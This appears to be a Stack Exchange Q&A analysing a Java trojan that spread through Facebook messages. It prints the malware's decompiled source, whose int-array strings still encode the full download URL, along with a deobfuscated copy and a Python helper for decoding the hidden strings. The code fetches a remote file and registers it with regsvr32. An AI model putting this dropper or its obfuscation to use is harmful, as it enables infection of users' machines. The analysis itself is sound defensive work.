Question

I have got this message two times on Facebook quoting "lol abc.rar". The abc.rar file has an executable jar file which, once clicked, tries to connect to Facebook and enters the same message into another chat randomly. I decompiled it using JD-GUI 0.36 and found a class czjffdqozxffyhrq inside this malware/virus; there is also a manifest file inside it. I tried VirusTotal but it gives no results. This is surely a threat as it has come to me from two Facebook friends of mine, who are unrelated to each other, so it's spreading very fast. VirusTotal result: https://www.virustotal.com/en/file/a5ce78b2b3e3d6a98982ec300ff05abc8b56a5ed27b9b67b2e2fc417fc56a9df/analysis/1397065080/

Now the code of the class:

package com.cakes;

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq
{
  public static String mrdbdgwortilmglt()
  {
    int[] tdclrmdqriktvlkvmy = { 104, 116, 116, 112, 58, 47, 47, 100, 108, 46, 100, 114, 111, 112, 98, 111, 120, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 115, 47, 110, 108, 100, 113, 99, 116, 110, 98, 118, 108, 101, 122, 52, 50, 98, 47, 109, 111, 100, 117, 108, 101, 46, 100, 97, 116, 63, 100, 108, 61, 49 };

    StringBuilder cfmbxqxdanzahnu = new StringBuilder(tdclrmdqriktvlkvmy.length);
    for (int i = 0; i < tdclrmdqriktvlkvmy.length; i++) {
      cfmbxqxdanzahnu.append((char)tdclrmdqriktvlkvmy[i]);
    }
    return cfmbxqxdanzahnu.toString();
  }

  public static String olzezeaokmr()
  {
    int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };

    StringBuilder uurwhymtb = new StringBuilder(wwlytwss.length);
    for (int i = 0; i < wwlytwss.length; i++) {
      uurwhymtb.append((char)wwlytwss[i]);
    }
    return uurwhymtb.toString();
  }

  public static String wxujpwlzjfvvc()
  {
    int[] krihniioygdowfq = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92 };

    StringBuilder dmpxcpok = new StringBuilder(krihniioygdowfq.length);
    for (int i = 0; i < krihniioygdowfq.length; i++) {
      dmpxcpok.append((char)krihniioygdowfq[i]);
    }
    return dmpxcpok.toString();
  }

  public static String uwqeeyesndtlyfye()
  {
    int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };

    StringBuilder eiljiba = new StringBuilder(wwlytwsspath.length);
    for (int i = 0; i < wwlytwsspath.length; i++) {
      eiljiba.append((char)wwlytwsspath[i]);
    }
    return eiljiba.toString();
  }

  public static void bnyikewbdrqhetgb()
    throws IOException
  {
    int m = 1;
    while (m < 7)
    {
      Runtime.getRuntime().exec(uwqeeyesndtlyfye());
      m++;
    }
  }

  public static void main(String[] args)
    throws Exception
  {
    new File(wxujpwlzjfvvc()).mkdir();
    File u = new File(olzezeaokmr());
    if (u.exists())
    {
      bnyikewbdrqhetgb();
    }
    else
    {
      String pdisodea = mrdbdgwortilmglt();
      String lwpztudm = olzezeaokmr();
      lslmzhpvu(pdisodea, lwpztudm);
    }
  }

  public static void lslmzhpvu(String rklnt, String nenyy)
    throws IOException
  {
    URL hsnmxltpgt = new URL(rklnt);
    InputStream mlzfltpyqeoqdahzvel = hsnmxltpgt.openStream();
    OutputStream uxvkcl = new FileOutputStream(nenyy);
    byte[] b = new byte[432101];
    int length;
    while ((length = mlzfltpyqeoqdahzvel.read(b)) != -1)
    {
      uxvkcl.write(b, 0, length);
    }
    mlzfltpyqeoqdahzvel.close();
    uxvkcl.close();
    bnyikewbdrqhetgb();
  }
}

Can someone please explain how this is working and why it is still not detectable?


Solution

Basically it downloads a file from:

http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/******.dat?dl=1

(obfuscated link, don't want anyone downloading it by mistake)

...to c:\temp and registers it in the system using:

regsvr32 /s <filename>

The real evil is probably in the downloaded file (which I'm not going to download :) )

OTHER TIPS

This is a pretty trivial attempt at obfuscation.

The methods:

  • mrdbdgwortilmglt
  • olzezeaokmr
  • wxujpwlzjfvvc
  • uwqeeyesndtlyfye

are just Strings hidden as arrays of ints.

bnyikewbdrqhetgb is clearly naughty, since it's calling Runtime.getRuntime().exec... that should always be a warning sign in code.

lslmzhpvu is accessing a URL... also naughty.

By "naughty", here, I mean it's code that is reaching outside of itself and so, potentially, doing harm elsewhere. In code that you've downloaded, that should be a major warning sign, unless you know that the code should be doing stuff with URLs or executing external programs.

Why doesn't an antivirus package catch it?

It is catching it. It detects the unauthorized attempt to access a URL and warns you.

Deobfuscated (a little):

import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;

public class czjffdqozxffyhrq
{
  public static String getDropBoxURL() {
    // This URL has been bowdlerized to protect the dangerously curious
    return "http://dl.dropboxusercontent.com/s/nldqctnbvlez42b/****.dat?dl=1";
  }

  public static String getTempFile() {
    return "C:\\temp\\qvsfccjm.gtj";
  }

  public static String getTempDir() {
    return "C:\\temp\\";
  }

  public static String getRegisterCommand() {
    return "regsvr32 /s C:\\temp\\qvsfccjm.gtj";
  }

  public static void registerControlSixTimes() throws IOException {
    int m = 1;
    while (m < 7)
    {
      Runtime.getRuntime().exec(getRegisterCommand());
      m++;
    }
  }

  public static void main(String[] args) throws Exception {
    new File(getTempDir()).mkdir();
    File u = new File(getTempFile());
    if (u.exists())
    {
      registerControlSixTimes();
    }
    else
    {
      String dbURL = getDropBoxURL();
      String tempFileName = getTempFile();
      downloadFromURLToFile(dbURL, tempFileName);
    }
  }

  public static void downloadFromURLToFile(String urlString, String fileName) throws IOException {
    URL url = new URL(urlString);
    InputStream in = url.openStream();
    OutputStream out = new FileOutputStream(fileName);
    byte[] b = new byte[432101];
    int length;
    while ((length = in.read(b)) != -1) {
      out.write(b, 0, length);
    }
    in.close();
    out.close();
    registerControlSixTimes();
  }
}
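
To turn the "Strings hidden as arrays of ints" trick described above into readable indicators, here is an added Python helper (not code from the question or either answer) that scans decompiled Java source for `int[] name = { ... };` literals, decodes the ones made only of printable ASCII, and labels each as a URL, Windows path or command. The embedded sample holds two arrays copied from the decompiled class in the question (the temp-file path and the regsvr32 command); the download-URL array decodes the same way and is left out here for the reason the answers give.

```python
import re

# Constructed sample input: two int[] literals copied from the decompiled
# class in the question (the temp-file path and the regsvr32 command).
SAMPLE_JAVA = """
    int[] wwlytwss = { 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
    int[] wwlytwsspath = { 114, 101, 103, 115, 118, 114, 51, 50, 32, 47, 115, 32, 67, 58, 92, 92, 116, 101, 109, 112, 92, 92, 113, 118, 115, 102, 99, 99, 106, 109, 46, 103, 116, 106 };
"""

# Matches `int[] name = { 1, 2, 3 };` as emitted by JD-GUI style decompilers.
ARRAY_RE = re.compile(r"int\[\]\s+(\w+)\s*=\s*\{([^}]*)\}\s*;")


def decode_int_arrays(java_source):
    """Map every int[] literal whose values are all printable ASCII to the
    string it hides; arrays with non-printable values are left out."""
    decoded = {}
    for name, body in ARRAY_RE.findall(java_source):
        values = [int(v) for v in body.split(",") if v.strip()]
        if values and all(32 <= v < 127 for v in values):
            decoded[name] = "".join(chr(v) for v in values)
    return decoded


def classify(text):
    """Rough triage label so an analyst can spot URLs, drop paths and
    shell commands among the recovered strings."""
    if re.match(r"https?://", text):
        return "url"
    if re.match(r"[A-Za-z]:\\", text):          # starts with a drive letter
        return "windows-path"
    if re.match(r"[\w.]+\s+\S", text):          # program name, then arguments
        return "command"
    return "other"


def triage(java_source):
    """Return [(array_name, label, decoded_string)] sorted by array name."""
    found = decode_int_arrays(java_source)
    return sorted((name, classify(s), s) for name, s in found.items())


if __name__ == "__main__":
    for name, label, value in triage(SAMPLE_JAVA):
        # The decoded paths really contain doubled backslashes (92, 92);
        # Windows tolerates that, so the dropper works with them anyway.
        print(f"{name:16} {label:13} {value}")
```

Running it against the full decompiled source from the question recovers all four hidden strings at once, which is quicker and less error-prone than decoding the arrays by hand.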
Licensed under: CC-BY-SA with attribution